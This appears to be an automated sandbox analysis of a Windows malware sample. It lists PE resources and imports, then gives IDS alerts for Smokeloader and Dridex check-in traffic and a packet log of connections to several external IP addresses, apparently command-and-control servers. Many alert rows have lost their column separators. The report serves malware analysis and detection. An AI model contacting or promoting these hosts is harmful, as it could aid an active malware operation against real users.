RT_ICON | 0x60ac0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.3694029850746269
RT_ICON | 0x60ac0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.3694029850746269
RT_ICON | 0x61968 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.4553249097472924
RT_ICON | 0x61968 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.4553249097472924
RT_ICON | 0x62210 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.4619815668202765
RT_ICON | 0x62210 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.4619815668202765
RT_ICON | 0x628d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.4552023121387283
RT_ICON | 0x628d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.4552023121387283
RT_ICON | 0x62e40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.2682572614107884
RT_ICON | 0x62e40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.2682572614107884
RT_ICON | 0x653e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.3074577861163227
RT_ICON | 0x653e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.3074577861163227
RT_ICON | 0x66490 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.3599290780141844
RT_ICON | 0x66490 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.3599290780141844
RT_ICON | 0x66960 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.5660980810234542
RT_ICON | 0x66960 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.5660980810234542
RT_ICON | 0x67808 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.5482851985559567
RT_ICON | 0x67808 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.5482851985559567
RT_ICON | 0x680b0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.615606936416185
RT_ICON | 0x680b0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.615606936416185
RT_ICON | 0x68618 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.4636929460580913
RT_ICON | 0x68618 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.4636929460580913
RT_ICON | 0x6abc0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.4880393996247655
RT_ICON | 0x6abc0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.4880393996247655
RT_ICON | 0x6bc68 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.4930327868852459
RT_ICON | 0x6bc68 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.4930327868852459
RT_ICON | 0x6c5f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.4530141843971631
RT_ICON | 0x6c5f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.4530141843971631
RT_ICON | 0x6cac0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.3784648187633262
RT_ICON | 0x6cac0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.3784648187633262
RT_ICON | 0x6d968 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.5058664259927798
RT_ICON | 0x6d968 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.5058664259927798
RT_ICON | 0x6e210 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.5599078341013825
RT_ICON | 0x6e210 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.5599078341013825
RT_ICON | 0x6e8d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.583092485549133
RT_ICON | 0x6e8d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.583092485549133
RT_ICON | 0x6ee40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.37053941908713695
RT_ICON | 0x6ee40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.37053941908713695
RT_ICON | 0x713e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.41228893058161353
RT_ICON | 0x713e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.41228893058161353
RT_ICON | 0x72490 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.40081967213114755
RT_ICON | 0x72490 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.40081967213114755
RT_ICON | 0x72e18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.46897163120567376
RT_ICON | 0x72e18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.46897163120567376
RT_ICON | 0x732f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.3742004264392324
RT_ICON | 0x732f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.3742004264392324
RT_ICON | 0x741a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.5171480144404332
RT_ICON | 0x741a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.5171480144404332
RT_ICON | 0x74a48 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.6059907834101382
RT_ICON | 0x74a48 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.6059907834101382
RT_ICON | 0x75110 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.6596820809248555
RT_ICON | 0x75110 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.6596820809248555
RT_ICON | 0x75678 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | India | 0.487551867219917
RT_ICON | 0x75678 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | Sri Lanka | 0.487551867219917
RT_ICON | 0x77c20 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | India | 0.5060975609756098
RT_ICON | 0x77c20 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | Sri Lanka | 0.5060975609756098
RT_ICON | 0x78cc8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | India | 0.4860655737704918
RT_ICON | 0x78cc8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | Sri Lanka | 0.4860655737704918
RT_ICON | 0x79650 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | India | 0.5390070921985816
RT_ICON | 0x79650 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | Sri Lanka | 0.5390070921985816
RT_DIALOG | 0x7dc28 | 0x58 | data | | | 0.8977272727272727
RT_STRING | 0x7dc80 | 0x2c6 | data | Tamil | India | 0.4830985915492958
RT_STRING | 0x7dc80 | 0x2c6 | data | Tamil | Sri Lanka | 0.4830985915492958
RT_STRING | 0x7df48 | 0x6b4 | data | Tamil | India | 0.42657342657342656
RT_STRING | 0x7df48 | 0x6b4 | data | Tamil | Sri Lanka | 0.42657342657342656
RT_STRING | 0x7e600 | 0x242 | data | Tamil | India | 0.4982698961937716
RT_STRING | 0x7e600 | 0x242 | data | Tamil | Sri Lanka | 0.4982698961937716
RT_STRING | 0x7e848 | 0x620 | data | Tamil | India | 0.4343112244897959
RT_STRING | 0x7e848 | 0x620 | data | Tamil | Sri Lanka | 0.4343112244897959
RT_STRING | 0x7ee68 | 0x292 | data | Tamil | India | 0.4817629179331307
RT_STRING | 0x7ee68 | 0x292 | data | Tamil | Sri Lanka | 0.4817629179331307
RT_ACCELERATOR | 0x79b30 | 0x48 | data | Tamil | India | 0.8472222222222222
RT_ACCELERATOR | 0x79b30 | 0x48 | data | Tamil | Sri Lanka | 0.8472222222222222
RT_GROUP_CURSOR | 0x79fd8 | 0x22 | data | | | 1.0294117647058822
RT_GROUP_CURSOR | 0x7bcb8 | 0x30 | data | | | 0.9375
RT_GROUP_CURSOR | 0x7d9a0 | 0x30 | data | | | 0.9375
RT_GROUP_ICON | 0x6ca58 | 0x68 | data | Tamil | India | 0.7019230769230769
RT_GROUP_ICON | 0x6ca58 | 0x68 | data | Tamil | Sri Lanka | 0.7019230769230769
RT_GROUP_ICON | 0x668f8 | 0x68 | data | Tamil | India | 0.6826923076923077
RT_GROUP_ICON | 0x668f8 | 0x68 | data | Tamil | Sri Lanka | 0.6826923076923077
RT_GROUP_ICON | 0x73280 | 0x76 | data | Tamil | India | 0.6779661016949152
RT_GROUP_ICON | 0x73280 | 0x76 | data | Tamil | Sri Lanka | 0.6779661016949152
RT_GROUP_ICON | 0x79ab8 | 0x76 | data | Tamil | India | 0.6779661016949152
RT_GROUP_ICON | 0x79ab8 | 0x76 | data | Tamil | Sri Lanka | 0.6779661016949152
RT_VERSION | 0x7d9d0 | 0x258 | data | | | 0.545
DLL | Import
--- | ---
KERNEL32.dll | GlobalCompact, CommConfigDialogA, InterlockedIncrement, InterlockedDecrement, SetEnvironmentVariableW, QueryDosDeviceA, InterlockedCompareExchange, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, SetFileTime, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, GetVersionExW, GetFileAttributesA, CreateProcessA, GetModuleFileNameW, CreateActCtxA, GetConsoleAliasExesA, GetShortPathNameA, CreateJobObjectA, LCMapStringA, VerifyVersionInfoW, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetShortPathNameW, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, GetLocaleInfoA, SetFilePointer, GetEnvironmentVariableA, EnumCalendarInfoA, WriteConsoleW, CloseHandle, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CreateFileW
GDI32.dll | CreateDCW, GetCharWidth32A, GetCharWidthI
WINHTTP.dll | WinHttpOpen
Language of compilation system | Country where language is spoken | Map
--- | --- | ---
Tamil | India | 
Tamil | Sri Lanka | 
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
--- | --- | --- | --- | --- | --- | --- | --- | ---
2024-10-08T00:19:56.521297+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49736 | 109.175.29.39 | 80 | TCP
2024-10-08T00:19:57.933998+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49737 | 109.175.29.39 | 80 | TCP
2024-10-08T00:19:58.702026+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49738 | 109.175.29.39 | 80 | TCP
2024-10-08T00:19:59.466827+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49739 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:00.843226+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49740 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:01.602248+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49741 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:02.373195+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49742 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:03.357049+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49743 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:04.230689+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49744 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:05.016635+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49745 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:05.782303+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49746 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:06.621612+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49747 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:07.425060+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49748 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:08.187550+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49749 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:08.988328+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49750 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:09.999180+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49751 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:10.795484+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49752 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:11.585121+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49753 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:12.351541+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49754 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:13.116137+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49755 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:14.108812+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49756 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:14.977527+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49757 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:15.765843+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49758 | 109.175.29.39 | 80 | TCP
                                                                                                      2024-10-08T00:20:16.759382+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449759109.175.29.3980TCP
                                                                                                      2024-10-08T00:20:19.925424+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449761109.175.29.3980TCP
                                                                                                      2024-10-08T00:20:20.864927+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449762109.175.29.3980TCP
                                                                                                      2024-10-08T00:20:21.652306+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449763109.175.29.3980TCP
                                                                                                      2024-10-08T00:20:22.408715+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449764109.175.29.3980TCP
                                                                                                      2024-10-08T00:20:23.179852+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449765109.175.29.3980TCP
                                                                                                      2024-10-08T00:20:23.967118+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449767109.175.29.3980TCP
                                                                                                      2024-10-08T00:20:24.908316+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449773109.175.29.3980TCP
                                                                                                      2024-10-08T00:20:26.073161+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449774109.175.29.3980TCP
                                                                                                      2024-10-08T00:20:26.858013+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449786109.175.29.3980TCP
                                                                                                      2024-10-08T00:20:42.524219+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44988223.145.40.168443TCP
                                                                                                      2024-10-08T00:20:42.888093+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44988223.145.40.168443TCP
                                                                                                      2024-10-08T00:20:43.053544+02002829848ETPRO MALWARE SmokeLoader encrypted module (3)223.145.40.168443192.168.2.449882TCP
                                                                                                      2024-10-08T00:20:43.856995+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44989023.145.40.168443TCP
                                                                                                      2024-10-08T00:20:44.200827+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44989023.145.40.168443TCP
                                                                                                      2024-10-08T00:20:44.985987+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44989823.145.40.168443TCP
                                                                                                      2024-10-08T00:20:45.235539+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44989823.145.40.168443TCP
                                                                                                      2024-10-08T00:20:45.842246+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44990223.145.40.168443TCP
                                                                                                      2024-10-08T00:20:46.119294+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44990223.145.40.168443TCP
                                                                                                      2024-10-08T00:20:46.708528+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44991323.145.40.168443TCP
                                                                                                      2024-10-08T00:20:46.993552+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44991323.145.40.168443TCP
                                                                                                      2024-10-08T00:20:47.583687+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44991923.145.40.168443TCP
                                                                                                      2024-10-08T00:20:47.872357+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44991923.145.40.168443TCP
                                                                                                      2024-10-08T00:20:49.538695+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44992523.145.40.168443TCP
                                                                                                      2024-10-08T00:20:49.815775+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44992523.145.40.168443TCP
                                                                                                      2024-10-08T00:20:50.760609+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44993123.145.40.168443TCP
                                                                                                      2024-10-08T00:20:51.040714+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44993123.145.40.168443TCP
                                                                                                      2024-10-08T00:20:51.653515+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44994123.145.40.168443TCP
                                                                                                      2024-10-08T00:20:51.921800+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44994123.145.40.168443TCP
                                                                                                      2024-10-08T00:20:52.681299+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44994823.145.40.168443TCP
                                                                                                      2024-10-08T00:20:52.967975+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44994823.145.40.168443TCP
                                                                                                      2024-10-08T00:20:53.570072+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44995423.145.40.168443TCP
                                                                                                      2024-10-08T00:20:53.854687+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44995423.145.40.168443TCP
                                                                                                      2024-10-08T00:20:55.270683+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44996023.145.40.168443TCP
                                                                                                      2024-10-08T00:20:55.555195+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44996023.145.40.168443TCP
                                                                                                      2024-10-08T00:20:56.144229+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44996623.145.40.168443TCP
                                                                                                      2024-10-08T00:20:56.434723+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44996623.145.40.168443TCP
                                                                                                      2024-10-08T00:20:57.019675+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44997223.145.40.168443TCP
                                                                                                      2024-10-08T00:20:57.296278+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44997223.145.40.168443TCP
                                                                                                      2024-10-08T00:20:57.887464+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44997823.145.40.168443TCP
                                                                                                      2024-10-08T00:20:58.168391+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44997823.145.40.168443TCP
                                                                                                      2024-10-08T00:20:58.778951+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44998423.145.40.168443TCP
                                                                                                      2024-10-08T00:20:59.035838+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44998423.145.40.168443TCP
                                                                                                      2024-10-08T00:20:59.634156+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44999423.145.40.168443TCP
                                                                                                      2024-10-08T00:21:00.185280+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44999423.145.40.168443TCP
                                                                                                      2024-10-08T00:21:01.242575+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45000123.145.40.168443TCP
                                                                                                      2024-10-08T00:21:01.521449+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45000123.145.40.168443TCP
                                                                                                      2024-10-08T00:21:02.152391+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45000723.145.40.168443TCP
                                                                                                      2024-10-08T00:21:02.425405+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45000723.145.40.168443TCP
                                                                                                      2024-10-08T00:21:03.074243+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45001323.145.40.168443TCP
                                                                                                      2024-10-08T00:21:03.346072+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45001323.145.40.168443TCP
                                                                                                      2024-10-08T00:21:11.009960+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005023.145.40.168443TCP
                                                                                                      2024-10-08T00:21:33.567262+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450057109.175.29.3980TCP
                                                                                                      2024-10-08T00:21:35.197944+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450058109.175.29.3980TCP
                                                                                                      2024-10-08T00:21:37.723611+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450059109.175.29.3980TCP
                                                                                                      2024-10-08T00:21:39.805320+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450060109.175.29.3980TCP
                                                                                                      2024-10-08T00:21:52.355257+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450061109.175.29.3980TCP
                                                                                                      2024-10-08T00:22:08.472860+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450062109.175.29.3980TCP
                                                                                                      2024-10-08T00:22:27.583209+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006323.145.40.168443TCP
                                                                                                      2024-10-08T00:22:27.911815+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006323.145.40.168443TCP
                                                                                                      2024-10-08T00:22:30.172982+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450064211.171.233.12980TCP
                                                                                                      2024-10-08T00:22:49.728426+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006523.145.40.168443TCP
                                                                                                      2024-10-08T00:22:50.083810+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006523.145.40.168443TCP
                                                                                                      2024-10-08T00:22:52.888320+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450066211.171.233.12980TCP
                                                                                                      2024-10-08T00:23:14.226648+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006723.145.40.168443TCP
                                                                                                      2024-10-08T00:23:14.580007+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006723.145.40.168443TCP
                                                                                                      2024-10-08T00:23:20.288275+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450068211.171.233.12980TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 00:19:55.730796099 CEST | 49736 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:55.736869097 CEST | 80 | 49736 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:55.736978054 CEST | 49736 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:55.737164021 CEST | 49736 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:55.737196922 CEST | 49736 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:55.743798018 CEST | 80 | 49736 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:55.745457888 CEST | 80 | 49736 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:56.520555973 CEST | 80 | 49736 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:56.521239996 CEST | 80 | 49736 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:56.521296978 CEST | 49736 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:56.533974886 CEST | 49736 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:56.541193008 CEST | 80 | 49736 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:57.165617943 CEST | 49737 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:57.172564983 CEST | 80 | 49737 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:57.172641993 CEST | 49737 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:57.174031019 CEST | 49737 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:57.174042940 CEST | 49737 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:57.180686951 CEST | 80 | 49737 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:57.182286978 CEST | 80 | 49737 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:57.933917046 CEST | 80 | 49737 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:57.933943033 CEST | 80 | 49737 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:57.933998108 CEST | 49737 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:57.934154987 CEST | 49737 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:57.936903954 CEST | 49738 | 80 | 192.168.2.4 | 109.175.29.39
Oct 8, 2024 00:19:57.941179037 CEST | 80 | 49737 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:57.944029093 CEST | 80 | 49738 | 109.175.29.39 | 192.168.2.4
Oct 8, 2024 00:19:57.944099903 CEST | 49738 | 80 | 192.168.2.4 | 109.175.29.39
